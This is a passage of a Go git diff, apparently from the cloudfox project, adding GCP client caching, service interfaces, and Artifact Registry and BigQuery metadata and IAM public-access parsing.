clears all entries from the cache +func ClearCache() { + GCPSDKCache.Flush() +} + +// CacheStats returns cache statistics +type CacheStats struct { + ItemCount int + Hits uint64 + Misses uint64 +} + +// GetCacheStats returns current cache statistics +func GetCacheStats() CacheStats { + return CacheStats{ + ItemCount: GCPSDKCache.ItemCount(), + // Note: go-cache doesn't track hits/misses directly + // These would need custom implementation if needed + } +} + +// SetCacheExpiration sets a custom expiration for an item +func SetCacheExpiration(key string, value interface{}, expiration time.Duration) { + GCPSDKCache.Set(key, value, expiration) +} + +// GetFromCache retrieves an item from cache +func GetFromCache(key string) (interface{}, bool) { + return GCPSDKCache.Get(key) +} + +// SetInCache stores an item in cache with default expiration +func SetInCache(key string, value interface{}) { + GCPSDKCache.Set(key, value, 0) // 0 = use default expiration +} + +// DeleteFromCache removes an item from cache +func DeleteFromCache(key string) { + GCPSDKCache.Delete(key) +} diff --git a/gcp/sdk/clients.go b/gcp/sdk/clients.go new file mode 100644 index 00000000..2137ebb5 --- /dev/null +++ b/gcp/sdk/clients.go @@ -0,0 +1,185 @@ +package sdk + +import ( + "context" + "fmt" + + "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + artifactregistry "google.golang.org/api/artifactregistry/v1" + bigquery "google.golang.org/api/bigquery/v2" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + iam "google.golang.org/api/iam/v1" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" +) + +// GetStorageClient returns a Cloud Storage client +func GetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + client, err := storage.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage client: %w", err) + } + return client, nil +} + +// GetComputeService returns a Compute Engine service +func GetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + service, err := compute.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %w", err) + } + return service, nil +} + +// GetIAMService returns an IAM Admin service +func GetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + service, err := iam.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %w", err) + } + return service, nil +} + +// GetResourceManagerService returns a Cloud Resource Manager service +func GetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + service, err := cloudresourcemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create resource manager service: %w", err) + } + return service, nil +} + +// GetSecretManagerService returns a Secret Manager service +func GetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { + service, err := secretmanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager service: %w", err) + } + return service, nil +} + +// GetBigQueryService returns a BigQuery service +func GetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigquery.Service, error) { + service, err := bigquery.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery service: %w", err) + } + return service, nil +} + +// GetArtifactRegistryService returns an Artifact Registry service +func GetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Service, error) { + service, err := artifactregistry.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Artifact Registry service: %w", err) + } + return service, nil +} + +// GetContainerService returns a GKE Container service +func GetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + service, err := container.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create container service: %w", err) + } + return service, nil +} + +// GetCloudRunService returns a Cloud Run service +func GetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + service, err := run.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %w", err) + } + return service, nil +} + +// ------------------------- CACHED CLIENT WRAPPERS ------------------------- + +// CachedGetStorageClient returns a cached Storage client +func CachedGetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + cacheKey := CacheKey("client", "storage") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storage.Client), nil + } + + client, err := GetStorageClient(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetComputeService returns a cached Compute Engine service +func CachedGetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + cacheKey := CacheKey("client", "compute") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*compute.Service), nil + } + + service, err := GetComputeService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAMService returns a cached IAM service +func CachedGetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + cacheKey := CacheKey("client", "iam") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iam.Service), nil + } + + service, err := GetIAMService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetResourceManagerService returns a cached Resource Manager service +func CachedGetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + cacheKey := CacheKey("client", "resourcemanager") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudresourcemanager.Service), nil + } + + service, err := GetResourceManagerService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerService returns a cached Secret Manager service +func CachedGetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { + cacheKey := CacheKey("client", "secretmanager") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanager.Service), nil + } + + service, err := GetSecretManagerService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} diff --git a/gcp/sdk/interfaces.go b/gcp/sdk/interfaces.go new file mode 100644 index 00000000..9206bc87 --- /dev/null +++ b/gcp/sdk/interfaces.go @@ -0,0 +1,138 @@ +package sdk + +import ( + "context" + + "cloud.google.com/go/iam" + "cloud.google.com/go/storage" + compute "google.golang.org/api/compute/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudresourcemanagerv2 "google.golang.org/api/cloudresourcemanager/v2" + secretmanager "google.golang.org/api/secretmanager/v1" + iam_admin "google.golang.org/api/iam/v1" +) + +// StorageClientInterface defines the interface for Cloud Storage operations +type StorageClientInterface interface { + Buckets(ctx context.Context, projectID string) *storage.BucketIterator + Bucket(name string) *storage.BucketHandle + Close() error +} + +// StorageBucketInterface defines the interface for bucket operations +type StorageBucketInterface interface { + Attrs(ctx context.Context) (*storage.BucketAttrs, error) + IAM() *iam.Handle + Object(name string) *storage.ObjectHandle + Objects(ctx context.Context, q *storage.Query) *storage.ObjectIterator +} + +// ComputeServiceInterface defines the interface for Compute Engine operations +type ComputeServiceInterface interface { + // Instances + ListInstances(ctx context.Context, projectID, zone string) (*compute.InstanceList, error) + AggregatedListInstances(ctx context.Context, projectID string) (*compute.InstanceAggregatedList, error) + GetInstance(ctx context.Context, projectID, zone, instanceName string) (*compute.Instance, error) + + // Networks + ListNetworks(ctx context.Context, projectID string) (*compute.NetworkList, error) + GetNetwork(ctx context.Context, projectID, networkName string) (*compute.Network, error) + + // Firewalls + ListFirewalls(ctx context.Context, projectID string) (*compute.FirewallList, error) + + // Zones + ListZones(ctx context.Context, projectID string) (*compute.ZoneList, error) +} + +// IAMServiceInterface defines the interface for IAM operations +type IAMServiceInterface interface { + // Service Accounts + ListServiceAccounts(ctx context.Context, projectID string) ([]*iam_admin.ServiceAccount, error) + GetServiceAccount(ctx context.Context, name string) (*iam_admin.ServiceAccount, error) + ListServiceAccountKeys(ctx context.Context, name string) ([]*iam_admin.ServiceAccountKey, error) + + // Roles + ListRoles(ctx context.Context, projectID string) ([]*iam_admin.Role, error) + GetRole(ctx context.Context, name string) (*iam_admin.Role, error) +} + +// ResourceManagerServiceInterface defines the interface for Cloud Resource Manager operations +type ResourceManagerServiceInterface interface { + // Projects + ListProjects(ctx context.Context) ([]*cloudresourcemanager.Project, error) + GetProject(ctx context.Context, projectID string) (*cloudresourcemanager.Project, error) + GetProjectIAMPolicy(ctx context.Context, projectID string) (*cloudresourcemanager.Policy, error) + + // Organizations + ListOrganizations(ctx context.Context) ([]*cloudresourcemanager.Organization, error) + GetOrganization(ctx context.Context, name string) (*cloudresourcemanager.Organization, error) + GetOrganizationIAMPolicy(ctx context.Context, resource string) (*cloudresourcemanager.Policy, error) + + // Folders + ListFolders(ctx context.Context, parent string) ([]*cloudresourcemanagerv2.Folder, error) +} + +// SecretManagerServiceInterface defines the interface for Secret Manager operations +type SecretManagerServiceInterface interface { + // Secrets + ListSecrets(ctx context.Context, projectID string) ([]*secretmanager.Secret, error) + GetSecret(ctx context.Context, name string) (*secretmanager.Secret, error) + ListSecretVersions(ctx context.Context, secretName string) ([]*secretmanager.SecretVersion, error) + AccessSecretVersion(ctx context.Context, name string) (*secretmanager.AccessSecretVersionResponse, error) +} + +// BigQueryServiceInterface defines the interface for BigQuery operations +type BigQueryServiceInterface interface { + ListDatasets(ctx context.Context, projectID string) ([]string, error) + ListTables(ctx context.Context, projectID, datasetID string) ([]string, error) + GetDatasetIAMPolicy(ctx context.Context, projectID, datasetID string) (interface{}, error) + GetTableIAMPolicy(ctx context.Context, projectID, datasetID, tableID string) (interface{}, error) +} + +// ArtifactRegistryServiceInterface defines the interface for Artifact Registry operations +type ArtifactRegistryServiceInterface interface { + ListRepositories(ctx context.Context, projectID, location string) ([]interface{}, error) + GetRepository(ctx context.Context, name string) (interface{}, error) + ListDockerImages(ctx context.Context, parent string) ([]interface{}, error) +} + +// CloudFunctionsServiceInterface defines the interface for Cloud Functions operations +type CloudFunctionsServiceInterface interface { + ListFunctions(ctx context.Context, projectID, location string) ([]interface{}, error) + GetFunction(ctx context.Context, name string) (interface{}, error) + GetFunctionIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// CloudRunServiceInterface defines the interface for Cloud Run operations +type CloudRunServiceInterface interface { + ListServices(ctx context.Context, projectID, location string) ([]interface{}, error) + GetService(ctx context.Context, name string) (interface{}, error) + GetServiceIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// GKEServiceInterface defines the interface for GKE operations +type GKEServiceInterface interface { + ListClusters(ctx context.Context, projectID, location string) ([]interface{}, error) + GetCluster(ctx context.Context, name string) (interface{}, error) +} + +// PubSubServiceInterface defines the interface for Pub/Sub operations +type PubSubServiceInterface interface { + ListTopics(ctx context.Context, projectID string) ([]interface{}, error) + ListSubscriptions(ctx context.Context, projectID string) ([]interface{}, error) + GetTopicIAMPolicy(ctx context.Context, topic string) (interface{}, error) +} + +// KMSServiceInterface defines the interface for KMS operations +type KMSServiceInterface interface { + ListKeyRings(ctx context.Context, projectID, location string) ([]interface{}, error) + ListCryptoKeys(ctx context.Context, keyRing string) ([]interface{}, error) + GetCryptoKeyIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// LoggingServiceInterface defines the interface for Cloud Logging operations +type LoggingServiceInterface interface { + ListSinks(ctx context.Context, parent string) ([]interface{}, error) + ListMetrics(ctx context.Context, parent string) ([]interface{}, error) +} diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 60aed147..3018e319 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -4,14 +4,17 @@ import ( "context" "fmt" "strings" + "time" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" "google.golang.org/api/iterator" + iampb "google.golang.org/genproto/googleapis/iam/v1" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -32,11 +35,49 @@ func New(client *artifactregistry.Client) ArtifactRegistryService { DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { return client.ListDockerImages(ctx, req, opts...) }, + RawClient: client, }, } return ars } +// NewWithSession creates an ArtifactRegistryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (ArtifactRegistryService, error) { + ctx := context.Background() + var client *artifactregistry.Client + var err error + + if session != nil { + client, err = artifactregistry.NewClient(ctx, session.GetClientOption()) + } else { + client, err = artifactregistry.NewClient(ctx) + } + if err != nil { + return ArtifactRegistryService{}, fmt.Errorf("failed to create artifact registry client: %v", err) + } + + ars := ArtifactRegistryService{ + Client: &ArtifactRegistryClientWrapper{ + Closer: client.Close, + RepositoryLister: func(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { + return client.ListRepositories(ctx, req, opts...) + }, + LocationLister: func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] { + return client.ListLocations(ctx, req, opts...) + }, + RepositoryGetter: func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) { + return client.GetRepository(ctx, req, opts...) + }, + DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { + return client.ListDockerImages(ctx, req, opts...) + }, + RawClient: client, + }, + Session: session, + } + return ars, nil +} + var logger internal.Logger // RepositoriesAndArtifacts retrieves both repositories and their artifacts for a given projectID. @@ -100,20 +141,110 @@ func (ars *ArtifactRegistryService) Repositories(projectID string) ([]Repository return nil, err } - repositories = append(repositories, RepositoryInfo{ - Name: repo.Name, - Format: repo.Format.String(), - Description: repo.Description, - SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), - ProjectID: projectID, - Location: location, - }) + repoInfo := RepositoryInfo{ + Name: repo.Name, + Format: repo.Format.String(), + Description: repo.Description, + SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), + ProjectID: projectID, + Location: location, + Mode: repo.Mode.String(), + Labels: repo.Labels, + RegistryType: "artifact-registry", + } + + // Parse encryption + if repo.KmsKeyName != "" { + repoInfo.EncryptionType = "CMEK" + repoInfo.KMSKeyName = repo.KmsKeyName + } else { + repoInfo.EncryptionType = "Google-managed" + } + + // Parse cleanup policies + if repo.CleanupPolicies != nil { + repoInfo.CleanupPolicies = len(repo.CleanupPolicies) + } + + // Parse timestamps + if repo.CreateTime != nil { + repoInfo.CreateTime = repo.CreateTime.AsTime().Format(time.RFC3339) + } + if repo.UpdateTime != nil { + repoInfo.UpdateTime = repo.UpdateTime.AsTime().Format(time.RFC3339) + } + + // Get IAM policy for the repository + iamBindings, isPublic, publicAccess := ars.getRepositoryIAMPolicy(ctx, repo.Name) + repoInfo.IAMBindings = iamBindings + repoInfo.IsPublic = isPublic + repoInfo.PublicAccess = publicAccess + + repositories = append(repositories, repoInfo) } } return repositories, nil } +// getRepositoryIAMPolicy retrieves the IAM policy for a repository +func (ars *ArtifactRegistryService) getRepositoryIAMPolicy(ctx context.Context, repoName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + // Get raw client for IAM operations + client, ok := ars.Client.RawClient.(*artifactregistry.Client) + if !ok || client == nil { + return bindings, false, "Unknown" + } + + // Get IAM policy + req := &iampb.GetIamPolicyRequest{ + Resource: repoName, + } + + policy, err := client.GetIamPolicy(ctx, req) + if err != nil { + // Return empty bindings if we can't get the policy + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, binding := range policy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + // Artifacts fetches the artifacts for a given repository, handling different formats. func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, repositoryName string) ([]ArtifactInfo, error) { ctx := context.Background() @@ -192,17 +323,38 @@ func (ars *ArtifactRegistryService) DockerImages(repositoryName string) ([]Artif // Parse image name to extract detailed information. details := parseDockerImageName(image.Name) - // Populate the ArtifactInfo structure with Docker image details. - artifacts = append(artifacts, ArtifactInfo{ + // Build version from tags or digest + version := details.Digest + if len(image.Tags) > 0 { + version = image.Tags[0] // Use first tag as version + } + + artifact := ArtifactInfo{ Name: details.ImageName, Format: "DOCKER", Location: details.Location, Repository: details.Repository, SizeBytes: fmt.Sprintf("%d", image.ImageSizeBytes), - Updated: image.UpdateTime.AsTime().String(), Digest: details.Digest, ProjectID: details.ProjectID, - }) + Tags: image.Tags, + MediaType: image.MediaType, + URI: image.Uri, + Version: version, + } + + // Parse timestamps + if image.UpdateTime != nil { + artifact.Updated = image.UpdateTime.AsTime().Format(time.RFC3339) + } + if image.UploadTime != nil { + artifact.Uploaded = image.UploadTime.AsTime().Format(time.RFC3339) + } + if image.BuildTime != nil { + artifact.BuildTime = image.BuildTime.AsTime().Format(time.RFC3339) + } + + artifacts = append(artifacts, artifact) } return artifacts, nil @@ -234,3 +386,73 @@ func (ars *ArtifactRegistryService) projectLocations(projectID string) ([]string return locations, nil } + +// ContainerRegistryRepositories enumerates legacy Container Registry (gcr.io) repositories +// Container Registry stores images in Cloud Storage buckets, so we check for those buckets +func (ars *ArtifactRegistryService) ContainerRegistryRepositories(projectID string) []RepositoryInfo { + var repositories []RepositoryInfo + + // Container Registry uses specific bucket naming conventions: + // - gcr.io -> artifacts.{project-id}.appspot.com (us multi-region) + // - us.gcr.io -> us.artifacts.{project-id}.appspot.com + // - eu.gcr.io -> eu.artifacts.{project-id}.appspot.com + // - asia.gcr.io -> asia.artifacts.{project-id}.appspot.com + + gcrLocations := []struct { + hostname string + location string + }{ + {"gcr.io", "us"}, + {"us.gcr.io", "us"}, + {"eu.gcr.io", "eu"}, + {"asia.gcr.io", "asia"}, + } + + for _, gcr := range gcrLocations { + // Create a repository entry for potential GCR location + // Note: We can't easily verify if the bucket exists without storage API access + // This creates potential entries that the command can verify + repo := RepositoryInfo{ + Name: fmt.Sprintf("%s/%s", gcr.hostname, projectID), + Format: "DOCKER", + Description: fmt.Sprintf("Legacy Container Registry at %s", gcr.hostname), + ProjectID: projectID, + Location: gcr.location, + Mode: "STANDARD_REPOSITORY", + EncryptionType: "Google-managed", + RegistryType: "container-registry", + PublicAccess: "Unknown", // Would need storage bucket IAM check + } + repositories = append(repositories, repo) + } + + return repositories +} + +// getMemberType extracts the member type from a GCP IAM member string +func GetMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} diff --git a/gcp/services/artifactRegistryService/models.go b/gcp/services/artifactRegistryService/models.go index 24f3ca37..92253a2d 100644 --- a/gcp/services/artifactRegistryService/models.go +++ b/gcp/services/artifactRegistryService/models.go @@ -5,6 +5,7 @@ import ( artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -15,27 +16,58 @@ type CombinedRepoArtifactInfo struct { Artifacts []ArtifactInfo `json:"artifacts"` } +// IAMBinding represents a single IAM binding on a repository +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + // ArtifactInfo represents the basic information of an artifact within a registry. type ArtifactInfo struct { - Name string `json:"name"` - Format string `json:"format"` - Version string `json:"version"` - Location string `json:"location"` - Repository string `json:"repository"` - SizeBytes string `json:"virtualSize"` - Updated string `json:"updated"` - Digest string `json:"digest"` - ProjectID string `json:"projectID"` + Name string `json:"name"` + Format string `json:"format"` + Version string `json:"version"` + Location string `json:"location"` + Repository string `json:"repository"` + SizeBytes string `json:"virtualSize"` + Updated string `json:"updated"` + Uploaded string `json:"uploaded"` + BuildTime string `json:"buildTime"` + Digest string `json:"digest"` + ProjectID string `json:"projectID"` + Tags []string `json:"tags"` + MediaType string `json:"mediaType"` + URI string `json:"uri"` } // RepositoryInfo holds information about a repository and its artifacts. type RepositoryInfo struct { + // Basic info Name string `json:"name"` Format string `json:"format"` Description string `json:"description"` SizeBytes string `json:"sizeBytes"` ProjectID string `json:"projectID"` Location string `json:"location"` + + // Security-relevant fields + Mode string `json:"mode"` // STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, REMOTE_REPOSITORY + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + CleanupPolicies int `json:"cleanupPolicies"` // Number of cleanup policies + Labels map[string]string `json:"labels"` + + // Timestamps + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // Registry type (for differentiating AR vs GCR) + RegistryType string `json:"registryType"` // "artifact-registry" or "container-registry" } // DockerImageDetails holds the extracted parts from a Docker image name. @@ -54,6 +86,7 @@ type ArtifactRegistryClientWrapper struct { LocationLister func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] RepositoryGetter func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) DockerImageLister func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] + RawClient interface{} // Store raw client for IAM operations } func (w *ArtifactRegistryClientWrapper) ListRepositories(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { @@ -74,5 +107,6 @@ func (w *ArtifactRegistryClientWrapper) ListDockerImages(ctx context.Context, re // ArtifactRegistryService provides methods to interact with Artifact Registry resources. type ArtifactRegistryService struct { - Client *ArtifactRegistryClientWrapper + Client *ArtifactRegistryClientWrapper + Session *gcpinternal.SafeSession } diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 426cb03f..1dc2a89b 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -2,33 +2,89 @@ package bigqueryservice import ( "context" + "fmt" + "strings" "time" "cloud.google.com/go/bigquery" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/iterator" ) -// BigqueryDataset represents a dataset in BigQuery +// AccessEntry represents an access control entry on a dataset +type AccessEntry struct { + Role string `json:"role"` // OWNER, WRITER, READER + EntityType string `json:"entityType"` // User, Group, Domain, ServiceAccount, etc. + Entity string `json:"entity"` // The actual entity identifier +} + +// BigqueryDataset represents a dataset in BigQuery with security-relevant fields type BigqueryDataset struct { - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - Description string - Name string - ProjectID string + // Basic info + DatasetID string `json:"datasetID"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + + // Security-relevant fields + DefaultTableExpiration time.Duration `json:"defaultTableExpiration"` + DefaultPartitionExpiration time.Duration `json:"defaultPartitionExpiration"` + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + Labels map[string]string `json:"labels"` + StorageBillingModel string `json:"storageBillingModel"` + MaxTimeTravel time.Duration `json:"maxTimeTravel"` + + // Access control (IAM-like) + AccessEntries []AccessEntry `json:"accessEntries"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" } -// BigqueryTable represents a table in BigQuery +// BigqueryTable represents a table in BigQuery with security-relevant fields type BigqueryTable struct { - TableID string - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - NumBytes int64 - Description string - ProjectID string + // Basic info + TableID string `json:"tableID"` + DatasetID string `json:"datasetID"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + Description string `json:"description"` + TableType string `json:"tableType"` // TABLE, VIEW, MATERIALIZED_VIEW, EXTERNAL, SNAPSHOT + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + ExpirationTime time.Time `json:"expirationTime"` + + // Size info + NumBytes int64 `json:"numBytes"` + NumLongTermBytes int64 `json:"numLongTermBytes"` + NumRows uint64 `json:"numRows"` + + // Security-relevant fields + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` + Labels map[string]string `json:"labels"` + RequirePartitionFilter bool `json:"requirePartitionFilter"` + + // Partitioning info + IsPartitioned bool `json:"isPartitioned"` + PartitioningType string `json:"partitioningType"` // "TIME" or "RANGE" + + // View info + IsView bool `json:"isView"` + ViewQuery string `json:"viewQuery"` + UseLegacySQL bool `json:"useLegacySQL"` + + // Streaming info + HasStreamingBuffer bool `json:"hasStreamingBuffer"` } // CombinedBigqueryData represents both datasets and tables within a project @@ -38,14 +94,19 @@ type CombinedBigqueryData struct { } type BigQueryService struct { - // Placeholder for any required services or configuration + session *gcpinternal.SafeSession } -// New creates a new instance of BigQueryService +// New creates a new instance of BigQueryService (legacy - uses ADC directly) func New() *BigQueryService { return &BigQueryService{} } +// NewWithSession creates a BigQueryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryService { + return &BigQueryService{session: session} +} + // gcloud alpha bq datasets list // gcloud alpha bq datasets describe terragoat_dev_dataset // gcloud alpha bq tables list --dataset terragoat_dev_dataset @@ -78,7 +139,14 @@ func (bq *BigQueryService) BigqueryDatasetsAndTables(projectID string) (Combined // BigqueryDatasets retrieves datasets from the given projectID across all locations func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { return nil, err } @@ -98,23 +166,137 @@ func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset if err != nil { return nil, err } - datasets = append(datasets, BigqueryDataset{ - DatasetID: ds.DatasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - Description: meta.Description, - Name: meta.Name, - ProjectID: projectID, - }) + + dataset := BigqueryDataset{ + DatasetID: ds.DatasetID, + Name: meta.Name, + Description: meta.Description, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + DefaultTableExpiration: meta.DefaultTableExpiration, + DefaultPartitionExpiration: meta.DefaultPartitionExpiration, + Labels: meta.Labels, + StorageBillingModel: meta.StorageBillingModel, + MaxTimeTravel: meta.MaxTimeTravel, + } + + // Parse encryption + if meta.DefaultEncryptionConfig != nil && meta.DefaultEncryptionConfig.KMSKeyName != "" { + dataset.EncryptionType = "CMEK" + dataset.KMSKeyName = meta.DefaultEncryptionConfig.KMSKeyName + } else { + dataset.EncryptionType = "Google-managed" + } + + // Parse access entries + accessEntries, isPublic, publicAccess := parseDatasetAccess(meta.Access) + dataset.AccessEntries = accessEntries + dataset.IsPublic = isPublic + dataset.PublicAccess = publicAccess + + datasets = append(datasets, dataset) } return datasets, nil } +// parseDatasetAccess converts BigQuery access entries to our format and checks for public access +func parseDatasetAccess(access []*bigquery.AccessEntry) ([]AccessEntry, bool, string) { + var entries []AccessEntry + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + 